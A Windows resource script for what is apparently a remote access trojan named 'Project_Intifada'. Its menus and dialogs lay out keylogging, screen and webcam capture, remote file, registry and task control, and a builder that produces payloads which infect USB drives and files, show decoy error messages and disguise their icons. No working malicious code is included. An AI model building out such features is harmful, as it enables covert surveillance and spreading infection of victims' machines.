#include "resource.h"
#include <windows.h>




//IDI_CANCELABT   ICON    DISCARDABLE    "Cancel2.ico"
//IDI_EXE         ICON    DISCARDABLE    "exe.ico"
IDB_EXE         BITMAP  DISCARDABLE    "udlg.bmp"
//IDI_ICON        ICON    DISCARDABLE    "Mlogo.ico"
IDB_TREE        BITMAP  DISCARDABLE    "DRIVE.BMP"
IDB_TREE2       BITMAP  DISCARDABLE    "CDDRIVE.BMP"
IDB_TREE3       BITMAP  DISCARDABLE    "DRIVENET.BMP"
IDB_TREE4       BITMAP  DISCARDABLE    "folder1.bmp"
IDB_TREE5       BITMAP  DISCARDABLE    "folder2.bmp"
IDB_TREE6       BITMAP  DISCARDABLE    "USB.bmp"
//IDI_TREE6       ICON    DISCARDABLE    "19201B8B-B672-40A2-9E29-E86C4336B7BE.ico"
IDB_SHOT        BITMAP  DISCARDABLE    "PR APP.bmp"
IDB_ABT         BITMAP  DISCARDABLE    "IntiAbout copy.bmp"
IDI_GREEN       ICON    DISCARDABLE    "green.ico"
IDI_IMG         ICON    DISCARDABLE    "pictures.ico"
IDB_IMG         BITMAP  DISCARDABLE    "Sky.BMP"
IDI_DOC         ICON    DISCARDABLE    "file1.ico"
IDB_DOC         BITMAP  DISCARDABLE    "file1.bmp"
IDI_TXT         ICON    DISCARDABLE    "notepad.ico"
IDB_TXT         BITMAP  DISCARDABLE    "notepad.bmp"
IDI_MEDIA       ICON    DISCARDABLE    "Media Clip_ico_1.ico"
IDB_MEDIA       BITMAP  DISCARDABLE    "Media Clip_ico_1.bmp"
IDI_WEB         ICON    DISCARDABLE    "firefox-icon.ico"
IDB_WEB         BITMAP  DISCARDABLE    "Internet Explorer.bmp"
IDB_SETUP       BITMAP  DISCARDABLE    "setup2.bmp"
IDI_ZIP         ICON    DISCARDABLE    "icon2.ico"
IDB_ZIP         BITMAP  DISCARDABLE    "icon2.bmp"
IDI_UNK         ICON    DISCARDABLE    "Default Document_ico_3.ico"
IDB_UNK         BITMAP  DISCARDABLE    "Default Document_ico_3.bmp"
IDI_PDF         ICON    DISCARDABLE    "FDFFile_8.ico"
IDB_PDF         BITMAP  DISCARDABLE    "FDFFile_8.bmp"
IDI_PROC        ICON    DISCARDABLE    "resources.ico"
IDB_PROC        BITMAP  DISCARDABLE    "resources.bmp"
IDB_EXE2        BITMAP  DISCARDABLE    "sizer04.bmp"
IDB_VID         BITMAP  DISCARDABLE    "WindowsMovieMaker.bmp"
IDI_VID2        ICON    DISCARDABLE    "film.ico"
IDB_FAIL        BITMAP  DISCARDABLE    "fail.bmp"
IDB_PASS        BITMAP  DISCARDABLE    "icon-passed.bmp"
IDB_PAUSE       BITMAP  DISCARDABLE    "pause.bmp"
IDB_REG_TREE1   BITMAP  DISCARDABLE    "OPENFOLD.bmp"
IDB_REG_TREE2   BITMAP  DISCARDABLE    "CLSDFOLD.bmp"
IDI_REG_TREE3   ICON    DISCARDABLE    "Icon_17.ico"
IDI_REG_TREE4   ICON    DISCARDABLE    "Icon_18.ico"
IDI_WINDOWS     ICON    DISCARDABLE    "prog_exe.ico"
IDB_WORM        BITMAP  DISCARDABLE    "stubgen.bmp"
IDI_SET         ICON    DISCARDABLE    "Process.ico"
IDB_SEARCH      BITMAP  DISCARDABLE    "icon-search.bmp"
IDB_PLAY        BITMAP  DISCARDABLE    "artsbuilderexecute.bmp"
IDB_STOP        BITMAP  DISCARDABLE    "stopbutton2.bmp"
IDI_PAUSE       ICON    DISCARDABLE    "file_pau.ico"
IDB_EXIT        BITMAP  DISCARDABLE    "Exit.bmp"
IDB_CFIG        BITMAP  DISCARDABLE    "Config.bmp"
IDB_SAVE        BITMAP  DISCARDABLE    "Save3.bmp"
IDI_SAVE        ICON    DISCARDABLE    "Save.ico"
IDB_BUILD       BITMAP  DISCARDABLE    "build.bmp"
IDB_ULSTAT      BITMAP  DISCARDABLE    "uploadstat.bmp"
IDB_DLSTAT      BITMAP  DISCARDABLE    "dloadstat.bmp"
IDB_ULFILESTAT  BITMAP  DISCARDABLE    "ulfilestat.bmp"
IDB_DLFILESTAT  BITMAP  DISCARDABLE    "dlfilestat.bmp"
IDB_CONN        BITMAP  DISCARDABLE    "conn.bmp"
IDB_INFFILE     BITMAP  DISCARDABLE    "infectfile.bmp"
IDB_INFUSB      BITMAP  DISCARDABLE    "infectusb.bmp"
IDB_LISTEN      BITMAP  DISCARDABLE    "listen.bmp"
IDB_STOPLISTEN  BITMAP  DISCARDABLE    "stoplisten.bmp"
IDB_SOCKET      BITMAP  DISCARDABLE    "socket.bmp"
IDB_ADMIN       BITMAP  DISCARDABLE    "Admin.bmp"
IDB_SYSCONTROL  BITMAP  DISCARDABLE    "control.bmp"
IDB_FILEMAN     BITMAP  DISCARDABLE    "filemanager.bmp"
IDB_TASKMAN     BITMAP  DISCARDABLE    "taskman3.bmp"
IDB_REGMAN      BITMAP  DISCARDABLE    "regman.bmp"
IDB_SCRSHT      BITMAP  DISCARDABLE    "screencapture.bmp"
IDB_WEBCAM      BITMAP  DISCARDABLE    "webcam.bmp"
IDB_KELOG       BITMAP  DISCARDABLE    "keylog.bmp"
IDB_SHUTDWN     BITMAP  DISCARDABLE    "shutdown.bmp"
IDB_LOGOFF      BITMAP  DISCARDABLE    "logoff.bmp"
IDB_UPLOAD      BITMAP  DISCARDABLE    "upload.bmp"
IDB_DOWNLOAD    BITMAP  DISCARDABLE    "download.bmp"
IDB_NEWFOLDER   BITMAP  DISCARDABLE    "nfolder.bmp"
IDB_COPY        BITMAP  DISCARDABLE    "copy-icon.bmp"
IDB_PASTE       BITMAP  DISCARDABLE    "paste-icon.bmp"
IDB_SPY         BITMAP  DISCARDABLE    "spy.bmp"
IDB_INFO        BITMAP  DISCARDABLE    "about2.bmp"
IDB_ABTICO      BITMAP  DISCARDABLE    "info2.bmp"
IDB_DLT         BITMAP  DISCARDABLE    "Delete_Icon.bmp"
IDB_REDO        BITMAP  DISCARDABLE    "rename-icon.bmp"
IDB_REFRESH     BITMAP  DISCARDABLE    "refresh.bmp"
IDB_CANCEL      BITMAP  DISCARDABLE    "Button Cancel.bmp"
IDB_EXECUTE     BITMAP  DISCARDABLE    "Execute2.bmp"
IDB_MONITOR     BITMAP  DISCARDABLE    "Monitor-icon.bmp"
IDB_POWERON     BITMAP  DISCARDABLE    "ON.bmp"
IDB_POWEROFF    BITMAP  DISCARDABLE    "OFF.bmp"
IDB_INSTALLS    BITMAP  DISCARDABLE    "INSTALL.BMP"
IDB_NETWORK     BITMAP  DISCARDABLE    "netfunc.bmp"
IDB_FACEBOOK    BITMAP  DISCARDABLE    "facebook.bmp"
IDB_TWITTER     BITMAP  DISCARDABLE    "twitter.bmp"
IDI_FACEBOOK    ICON    DISCARDABLE    "facedebook.ico"
IDI_QUESTIONX   ICON    DISCARDABLE    "VSDocs.ico"
IDI_INFOX       ICON    DISCARDABLE    "riched.ico"
IDB_WEBPAGE     BITMAP  DISCARDABLE    "webpage2.bmp"
IDI_SAVE2       ICON    DISCARDABLE    "Save (2).ico"
IDB_HOSTINFO    BITMAP  DISCARDABLE    "crashdump.bmp"
IDB_SCANPORT    BITMAP  DISCARDABLE    "scanport.bmp"
IDB_REF_CBOARD  BITMAP  DISCARDABLE    "refresh_clip.bmp"
IDB_DLT_CBOARD  BITMAP  DISCARDABLE    "clear_clip.bmp"
IDB_CPY_CBOARD  BITMAP  DISCARDABLE    "copy_clip.bmp"
IDB_WRT_CBOARD  BITMAP  DISCARDABLE    "write_clip.bmp"
IDB_PST_CBOARD  BITMAP  DISCARDABLE    "paste-clip.bmp"
//IDB_BALL        BITMAP  DISCARDABLE     "Frame2.bmp"
//IDB_TREE ICON    DISCARDABLE "LIST.BMP"
//IDB_TREE ICON    DISCARDABLE "HD.ico"


//IDR_EXE              RT_EXE  DISCARDABLE     "AryanRATServer.exe"


ID_SYSTRAY_MENU MENU
BEGIN
	POPUP "&SysTray"
	BEGIN
		MENUITEM "&About", ID_MMENU_ABOUT
		MENUITEM "Settings",ID_MMENU_OPTION_SETTING
		MENUITEM SEPARATOR
		MENUITEM "&Exit", ID_MMENU_EXIT
	END
END



ID_MAIN_MENU MENU
BEGIN
 /*POPUP "EDIT"
  BEGIN
   MENUITEM "+PORT LISTENER", ID_EDIT_PORTLISTENER
   MENUITEM "STUB GENERATOR", ID_EDIT_STUBGENERATOR
  END*/
 POPUP "Tools"
  BEGIN
    POPUP"Admin Functions"
     BEGIN
      MENUITEM SEPARATOR
      MENUITEM "File Manager", ID_TOOLS_FILEMANAGER
      MENUITEM SEPARATOR
      MENUITEM "Task Manager", ID_TOOLS_TASKMANAGER
      MENUITEM  SEPARATOR
      MENUITEM "Remote Registry", ID_TOOLS_REGMAN
      MENUITEM  SEPARATOR
     END
 MENUITEM SEPARATOR
    POPUP "Spy Functions"
     BEGIN
      MENUITEM "Screen Capture", IDC_SCREEN_CAP
      MENUITEM  SEPARATOR
      MENUITEM "Webcam Capture", ID_WEBCAM_CAP
      MENUITEM  SEPARATOR
      MENUITEM "Keylogger", ID_TOOLS_KEYLOGGER
     END
 MENUITEM SEPARATOR
    POPUP "System Controls"
     BEGIN
      MENUITEM "Shutdown", IDC_SYS_SHTDWN
      MENUITEM "Log off", IDC_SYS_LGOFF
      MENUITEM SEPARATOR
      MENUITEM "Monitor OFF", IDC_SYS_MOFF
      MENUITEM "Monitor ON", IDC_SYS_MON
     END
  END

 /*POPUP "HELP"
  BEGIN
   MENUITEM "Manual", ID_HELP_MANUAL
   MENUITEM "About",  ID_HELP_ABOUT
  END
 POPUP "Option"
  BEGIN
   MENUITEM "Exit", ID_OPTION_EXIT
  END*/
END


ID_TASK_MENU MENU

BEGIN
  POPUP "MENU"
  BEGIN
    MENUITEM "Kill Process", IDC_KILL_TASK
    MENUITEM SEPARATOR
    MENUITEM "Refresh List", IDC_REFRESH_TASK
  END
END


ID_SERVICE_MENU MENU

BEGIN
  POPUP "MENU"
  BEGIN
    MENUITEM "Start", IDC_START_SRVC
    MENUITEM SEPARATOR
    MENUITEM "Stop", IDC_STOP_SRVC
  END
END


ID_FILE_MENU MENU

BEGIN
  POPUP "MENU"
  BEGIN
   MENUITEM "Open", IDC_EXECUTE_FILE
   MENUITEM SEPARATOR
   //MENUITEM SEPARATOR
   MENUITEM "Copy", IDC_COPY_FILE
   MENUITEM "Paste", IDC_PASTE_FILE
   MENUITEM "Rename", IDC_RENAME_FILE
   //MENUITEM SEPARATOR
   MENUITEM "Delete", IDC_DELETE_FILE
   MENUITEM SEPARATOR
  POPUP"New"
  BEGIN
   MENUITEM "Folder", IDC_NEW_FOLDER
  END
   MENUITEM SEPARATOR
   MENUITEM "Download", IDC_DOWNLOAD_FILE
   MENUITEM "Upload file", IDC_UPLOAD_FILE
  END
END

ID_INSTALLED_MENU MENU

BEGIN
  POPUP "MENU"
  BEGIN
   MENUITEM "EXECUTE", IDC_IEXECUTE_FILE
  // MENUITEM SEPARATOR
   //MENUITEM "DOWNLOAD", IDC_IDOWNLOAD_FILE
   MENUITEM SEPARATOR
  // MENUITEM "DELETE", IDC_IDELETE_FILE
  END
END



DLG_MAIN DIALOGEX 106, 30, 490, 236

STYLE DS_LOCALEDIT | DS_MODALFRAME | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_CLIENTEDGE

   /* STYLE DS_LOCALEDIT | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_VISIBLE |
    WS_CAPTION | WS_SYSMENU | WS_THICKFRAME*/

   //STYLE DS_MODALFRAME |WS_POPUP |DS_CENTERMOUSE /*|WS_CAPTION*/| WS_SYSMENU
   //EXSTYLE WS_EX_ACCEPTFILES | WS_EX_CLIENTEDGE

CAPTION "Project_Intifada 1.0.2"

FONT 8, "Tahoma"

//STYLE 0x10CE0804

BEGIN
  //PUSHBUTTON         "&Listen",IDC_BTN_LISTEN/*, 0x10010000*/, 460,  5, 35, 12,0,WS_EX_CLIENTEDGE
  //PUSHBUTTON         "&Test",IDC_BTN_QUIT, /*0x10010000,*/ 460, 29, 35, 12,0,WS_EX_CLIENTEDGE
  CONTROL            "List1",IDC_LIST,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,0,66,490,144,WS_EX_CLIENTEDGE
  CONTROL            "List7",IDC_LIST7,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,0,66,490,144,WS_EX_CLIENTEDGE
  CONTROL            "List8",IDC_LIST8,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,0,66,490,144,WS_EX_CLIENTEDGE
  CONTROL            "MTab",IDC_MainTAB,"SysTabControl32",TCS_FIXEDWIDTH,
                     0,48,490,144,WS_EX_CLIENTEDGE
  GROUPBOX           "Port Setting",IDC_SETTING1_GRP,12,40,410,45
  GROUPBOX           "NO-IP SETTINGS",IDC_SETTING2_GRP,12,103,160,90
/*  LTEXT              "Main Port:",IDC_STATIC2,17,58,100,10
  EDITTEXT           ID_MAINPORT_EDIT,58,58,80,10,ES_AUTOHSCROLL
  LTEXT              "File Port:",IDC_STATIC3,185,58,80,10
  EDITTEXT           ID_FILEPORT_EDIT,225,58,80,10,ES_AUTOHSCROLL*/
  LTEXT              "NO_IP:",IDC_STATIC4,17,121,100,10
  EDITTEXT           ID_NO_IP_EDIT1,47,121,100,10,ES_AUTOHSCROLL
  LTEXT              "NO_IP:",IDC_STATIC5,17,143,100,10
  EDITTEXT           ID_NO_IP_EDIT2,47,143,100,10,ES_AUTOHSCROLL
  CONTROL            "Progress1",IDC_SHOTPROGRESS,"msctls_progress32",PBS_SMOOTH,
                     112,212,85,10,WS_EX_CLIENTEDGE
  //ICON               IDI_EXT_MAIN,IDC_EXT_MAIN,480,1,50,15

END



Keylog_Dlg DIALOGEX 6, 3, 310, 195
STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Keylogger"

FONT 8, "Tahoma"

BEGIN
  CONTROL   "Refresh", IDC_RTRV_BUT, "Button", 0x10010000, 5,  165, 46, 15//,// WS_EX_CLIENTEDGE
  CONTROL   "Save", IDC_SAVE_LOGS, "Button", 0x10010000, 260,  165, 46, 15//,// WS_EX_CLIENTEDGE
  CONTROL               "",IDC_DISP_LOG,"EDIT",ES_MULTILINE | ES_READONLY |
                        WS_VSCROLL | WS_HSCROLL | WS_TABSTOP,5,3,300,160,WS_EX_CLIENTEDGE

END



/*IDD_KEYLOG DIALOGEX 0, 0, 286, 150
//STYLE WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
//MENU IDR_KEY
CAPTION "INTIFADA_RAT"
FONT 8, "MS Sans Serif", 0, 0, 0x1
BEGIN
    CONTROL         "",IDC_KEYS,"EDIT",ES_MULTILINE | ES_AUTOVSCROLL |
                    ES_READONLY | WS_VSCROLL | WS_TABSTOP,5,5,200,100,
                    WS_EX_CLIENTEDGE
    CONTROL         "",IDC_KEYS2,"RICHEDIT",ES_MULTILINE | ES_AUTOVSCROLL |
                    ES_READONLY | WS_VSCROLL | WS_TABSTOP,37,42,142,53,
                    WS_EX_CLIENTEDGE
   // EDITTEXT        IDC_ID,0,0,38,10,ES_AUTOHSCROLL
END*/






File_Dlg DIALOGEX 6, 3, 390, 260

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU


CAPTION "File Manager "

FONT 8, "Tahoma"

BEGIN
  CONTROL "Tab1",          FILE_MAIN_TAB,"SysTabControl32",WS_CHILD|WS_VISIBLE|TCS_FOCUSNEVER,1,2,490,240
  CONTROL "List2",         IDC_LIST2,"SysListView32",LVS_REPORT|
                           LVS_SHOWSELALWAYS |WS_TABSTOP,120,54,260,180,WS_EX_CLIENTEDGE
  CONTROL "Tree1",         /*IDC_TREE1,"SysTreeView32",TVS_HASBUTTONS |
                           TVS_HASLINES | TVS_LINESATROOT | TVS_SHOWSELALWAYS |
                           WS_TABSTOP,1,17,110,180,WS_EX_CLIENTEDGE*/
                           IDC_TREE1,"SysTreeView32",TVS_HASBUTTONS |
                           TVS_HASLINES | TVS_LINESATROOT | TVS_EDITLABELS |
                           //TVS_TRACKSELECT | TVS_SINGLEEXPAND | TVS_INFOTIP |
                          // TVS_FULLROWSELECT |
                           WS_BORDER |
                           WS_TABSTOP,1,54,110,180,
                           WS_EX_ACCEPTFILES
  CONTROL "List4",         IDC_LIST4,"SysListView32",LVS_REPORT|
                           LVS_SHOWSELALWAYS |WS_TABSTOP,1,17,390,220,WS_EX_CLIENTEDGE
  CONTROL "List6",         IDC_LIST6,"SysListView32",LVS_REPORT|
                           LVS_SHOWSELALWAYS |WS_TABSTOP,1,17,390,220,WS_EX_CLIENTEDGE
  LTEXT                    "Filename: ",IDC_STATIC,10,33,50,10
  LTEXT                    "Filename: ",IDC_STATIC2,170,35,100,10
  EDITTEXT                 ID_SEARCH_EDIT,45,32,280,12,ES_AUTOHSCROLL
  EDITTEXT                 ID_SEARCH_EDIT2,220,35,60,10,ES_AUTOHSCROLL
  PUSHBUTTON "Search",         IDC_FSEARCH_BUTTON,340,32,35,12//,WS_EX_CLIENTEDGE
  GROUPBOX   "File Search",IDC_FSEARCH_GROUP,5,18,375,33
  //CONTROL    "Progress1",  IDC_DLPROGRESS,"msctls_progress32",PBS_SMOOTH,
                      //     3,244,80,10,WS_EX_CLIENTEDGE

END







IDD_SETTINGS DIALOG DISCARDABLE  50, 5, 300, 250
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Settings"
FONT 8, "MS Sans Serif"
BEGIN

  CONTROL            "",SETTING_TAB,"SysTabControl32",WS_CHILD|WS_VISIBLE|TCS_FOCUSNEVER,2,2,296,246
  GROUPBOX           "User settings",IDC_SSTATIC5,5,20,280,70
  CONTROL            "Autmatically refresh conections",IDC_REFRESH_USR,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,55,120,8
  COMBOBOX           IDC_REFRESHTIME,80,70,45,4,CBS_DROPDOWN|CBS_SORT|CB_SELECTSTRING |WS_VSCROLL|WS_TABSTOP
  LTEXT              "Refresh interval:",IDC_SSTATIC8,14,73,56,8
  CONTROL            "Notify me when new connection is made ",IDC_NOT_NEWUSR,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,40,145,8
  GROUPBOX           "Client settings",IDC_SSTATIC6,5,95,280,70
  CONTROL            "Automatically listen when client starts ",IDC_AUTO_LISTEN,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,110,130,8
  LTEXT              "Server password:",IDC_SSTATIC7,14,126,55,10
  EDITTEXT           IDC_SERV_PASSEDT,73,125,80,12,ES_AUTOHSCROLL|ES_PASSWORD
  GROUPBOX           "Socket settings",IDC_SSTATIC0,5,20,280,150
  LTEXT              "Main port:",IDC_SSTATIC1,10,40,35,10
  EDITTEXT           ID_MAINPORT_EDIT,50,40,80,10,ES_AUTOHSCROLL|ES_NUMBER
  LTEXT              "File port:",IDC_SSTATIC2,10,100,35,10
  EDITTEXT           ID_UPLDLPORT_EDIT,50,100,80,10,ES_AUTOHSCROLL|ES_NUMBER
  LTEXT              "Utility port:",IDC_SSTATIC3,10,115,35,10
  EDITTEXT           ID_UTILPORT_EDIT,50,115,80,10,ES_AUTOHSCROLL|ES_NUMBER
  CONTROL            "Automatic socket (Recommended)",IDC_SETPORTS_AUTO,"Button",BS_AUTORADIOBUTTON |
                     WS_TABSTOP,10,65,130,8
  CONTROL            "Manual socket",IDC_SETPORTS_MANUAL,"Button",BS_AUTORADIOBUTTON |
                     WS_TABSTOP,10,85,70,8
 // GROUPBOX           ".... Setting",IDC_STATIC,3,95,325,20
  PUSHBUTTON         "OK",IDC_SET_OK_BUTTON,240,230,50,14//,WS_EX_CLIENTEDGE
  GROUPBOX           "Download settings",IDC_SSTATIC4,5,20,280,120
  CONTROL            "Save files to",IDC_SAVE_DPATH1,"Button",BS_AUTORADIOBUTTON |
                     WS_TABSTOP,14,42,60,8
  EDITTEXT           IDC_DOWNLOAD_PATH,75,40,140,12,ES_AUTOHSCROLL | ES_READONLY
  CONTROL            "Always ask me where to save files",IDC_SAVE_DPATH2,"Button",BS_AUTORADIOBUTTON |
                     WS_TABSTOP,14,60,130,8
  PUSHBUTTON         "Browse...",IDC_DL_PATHBUTTON,215,40,40,13//,WS_EX_CLIENTEDGE
  CONTROL            "Show download window when downloading file",IDC_SHOW_DLPROG,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,100,180,8
  CONTROL            "Show upload window when uploading file",IDC_SHOW_ULPROG,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,115,180,8
  CONTROL            "Keep download log",IDC_KEEP_DLOG,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,80,80,8
  CONTROL            "Allow only one running instance(will take effect when client restarts)",IDC_ONE_INSTANCE,"Button",BS_AUTOCHECKBOX |
                     WS_TABSTOP,14,145,223,8



END









IDD_SERVEREDIT DIALOG DISCARDABLE  0, 0,280, 240
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Server generator"
FONT 8, "MS Sans Serif"
BEGIN

    LTEXT           "Name:",IDC_ESTATIC3,13,18,34,12
    GROUPBOX        "Server name",IDC_ESTATIC4,7,7,250,26
    EDITTEXT        IDC_EDIT_STUBNAME,59,16,180,12,ES_AUTOHSCROLL
    LTEXT           "IP/DNS:",IDC_ESTATIC5,13,58,27,12
    EDITTEXT        IDC_EDIT_IP,59,56,140,12,ES_AUTOHSCROLL
    GROUPBOX        "Network settings",IDC_ESTATIC6,7,40,250,130
    LTEXT           "Main port :",IDC_ESTATIC7,14,75,34,8
    EDITTEXT        IDC_EDIT_MAINPORT,59,75,50,12,ES_AUTOHSCROLL|ES_NUMBER
    CONTROL         "Automatic socket (Recommended)",IDC_AUTOSOCK_GEN,"Button",BS_AUTORADIOBUTTON |
                    WS_TABSTOP,14,96,130,8
    CONTROL         "Manual socket",IDC_MANSOCK_GEN,"Button",BS_AUTORADIOBUTTON |
                    WS_TABSTOP,14,115,130,8
    LTEXT           "Util port :",IDC_ESTATIC8,14,130,29,8
    EDITTEXT        IDC_EDIT_PROCESS,59,130,50,12,ES_AUTOHSCROLL|ES_NUMBER
    PUSHBUTTON      "Build",IDC_BUILD,200,220,40,12
    PUSHBUTTON      "Next",IDC_NEXT,210,220,40,12
    PUSHBUTTON      "Back",IDC_BACK,160,220,40,12
    //LTEXT           "Exe Name :",IDC_STATIC,13,69,37,10
    //EDITTEXT        IDC_EDIT_NAME,59,68,275,12,ES_AUTOHSCROLL
    //GROUPBOX        "Port Settings",IDC_ESTATIC1,7,90,226,65
    GROUPBOX        "Spread settings",IDC_ESTATIC2,7,7,250,50
    CONTROL         "Infect USB drives",IDC_INF,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,23,200,8
    CONTROL         "Infect all files inside drive",IDC_INFPLUS,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,38,200,8
    //GROUPBOX        "Name",IDC_STATIC,7,61,336,22
    //GROUPBOX        "Inject",IDC_STATIC,7,84,336,24
    EDITTEXT        IDC_EDIT_FILEPORT,59,145,50,12,ES_AUTOHSCROLL|ES_NUMBER
    LTEXT           "File port :",IDC_ESTATIC9,14,145,45,10
    LTEXT           "Name:",IDC_ESTATIC10,13,18,34,12
    GROUPBOX        "Security",IDC_ESTATIC14,7,175,250,36
    CONTROL         "Password server",IDC_PASSWORD,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,190,66,8
    EDITTEXT        IDC_PASS_EDIT,82,187,100,12,ES_AUTOHSCROLL|ES_PASSWORD
    //GROUPBOX        "Server Name",IDC_ESTATIC11,7,7,330,26
    GROUPBOX        "Server icon",IDC_ICOSTATIC,7,170,250,46
    GROUPBOX        "Error message",IDC_ESTATIC15,7,63,250,100
    CONTROL         "Display error message when first module loads",IDC_ERROR_MSG,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,72,200,10
    EDITTEXT        IDC_ERROR_TITLE,14,85,110,12,/*ES_AUTOVSCROLL|*/ES_AUTOHSCROLL
    EDITTEXT        IDC_ERROR_EDT,14,105,110,50,ES_MULTILINE|ES_AUTOVSCROLL//|ES_AUTOHSCROLL
    PUSHBUTTON      "Test",IDC_ERROR_TEST,136,144,30,12
    //GROUPBOX        "Spoof extension",IDC_ESTATIC12,7,113,250,40
    /*CONTROL         "Spoof server",IDC_SPOOF,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,125,55,8*/
    //LTEXT           "Fake extension:",IDC_ESTATIC13, 13,140,64,11
    //EDITTEXT        IDC_EXT_SPOOF,70,139,90,12,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_STUBIMG,14,193,170,12,ES_AUTOHSCROLL | ES_READONLY
    PUSHBUTTON      "Browse...",IDC_BROWSE_IMG,190,193,40,12
    CONTROL         "Add icon",IDC_ADDICON,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,14,179,40,8
    ICON            IDI_QUESTIONX,IDC_QUESTIONPASS,200,189,5,5
    ICON            IDI_QUESTIONX,IDC_QUESTIONERR,200,144,30,12
    //ICON            IDI_INFOX,IDC_SOCKINFO,200,147,116,12

END




About_Dlg DIALOGEX DISCARDABLE  650, 3, 210, 119

//STYLE  WS_POPUP |DS_CENTERMOUSE | WS_THICKFRAME | WS_SYSMENU | WS_MINIMIZE
//EXSTYLE WS_EX_CLIENTEDGE
STYLE DS_MODALFRAME  | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "About"

//FONT 8, "BankGothic LT BT"
FONT 8, "Franklin Gothic Demi"

BEGIN
//CONTROL         "<a> projectintafada</a>",IDC_SYSLINK1,"SysLink",WS_TABSTOP,1,205,61,9
//CONTROL         "<a>facebook</a>",IDC_SYSLINK2,"SysLink",WS_TABSTOP,1,220,32,9
//CONTROL         "<a>twitter</a>",IDC_SYSLINK3,"SysLink",WS_TABSTOP,41,220,25,9
//ICON            IDI_CANCELABT,IDC_CANCELABT,0,90,10,10
ICON            IDI_FACEBOOK,IDC_FBLINK,100,70,20,9
ICON            IDI_TWITTER,IDC_TWEETLINK,230,90,20,9


END



IDD_REGMAN_DLG DIALOGEX 0, 0, 396, 300
STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Registry manager"
FONT 8, "MS Sans Serif", 0, 0, 0x1
BEGIN
    CONTROL         "ListR",IDC_REGKEYLIST,"SysListView32",LVS_REPORT |
                    WS_TABSTOP,157,0,238,284,WS_EX_CLIENTEDGE
    CONTROL         "Tree1",IDC_REGTREE,"SysTreeView32",TVS_HASBUTTONS |
                    TVS_HASLINES | TVS_LINESATROOT | WS_TABSTOP,1,0,154,284,
                    WS_EX_CLIENTEDGE
    //EDITTEXT        IDC_ID,117,278,38,12,ES_AUTOHSCROLL
END



SCR_SHOT_Dlg DIALOGEX 6, 3, 462, 305

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Screen capture"

FONT 8, "Tahoma"

BEGIN
    /*CONTROL         "Progress2",IDC_PROGRESS,"msctls_progress32",PBS_SMOOTH,
                    12,307,70,12,WS_EX_CLIENTEDGE*/
    ICON             IDI_EXT_SCR,IDC_EXT_SCR,440,305,50,100
    ICON             IDI_SAVE_SCR,IDC_SAVE_SCR,12,305,50,100
END




WEB_SHOT_Dlg DIALOGEX 6, 3, 213, 150

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Webcam capture"

FONT 8, "Tahoma"

BEGIN

    ICON             IDI_EXT_CAM,IDC_EXT_CAM,190,152,50,100
    ICON             IDI_SAVE_CAM,IDC_SAVE_CAM,12,152,50,100

END



Task_Dlg DIALOGEX 6, 3, 330, 220

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Task manager"

FONT 8, "Tahoma"

BEGIN
  CONTROL "Tab2",    TASK_MAIN_TAB,"SysTabControl32",WS_CHILD|WS_VISIBLE|TCS_FOCUSNEVER,2,2,330,200
  CONTROL "List3",   IDC_LIST3,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,1,18,330,180,WS_EX_CLIENTEDGE
  CONTROL "List5",   IDC_LIST5,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,1,18,325,180,WS_EX_CLIENTEDGE
  CONTROL "List9",   IDC_LIST9,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,1,18,325,180,WS_EX_CLIENTEDGE
END


/*ID_CRPT_DLG DIALOGEX 5, 5, 275, 105
STYLE DS_MODALFRAME | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION |
    WS_SYSMENU
//STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_ACCEPTFILES
CAPTION "INTIFADA_RAT"
FONT 8, "Tahoma"
BEGIN
    //CONTROL         102,IDC_STATIC,"Static",SS_BITMAP,0,0,265,25
    GROUPBOX        "",IDC_STATIC,0,25,265,65
    LTEXT           "File:",IDC_STATIC,5,35,15,8
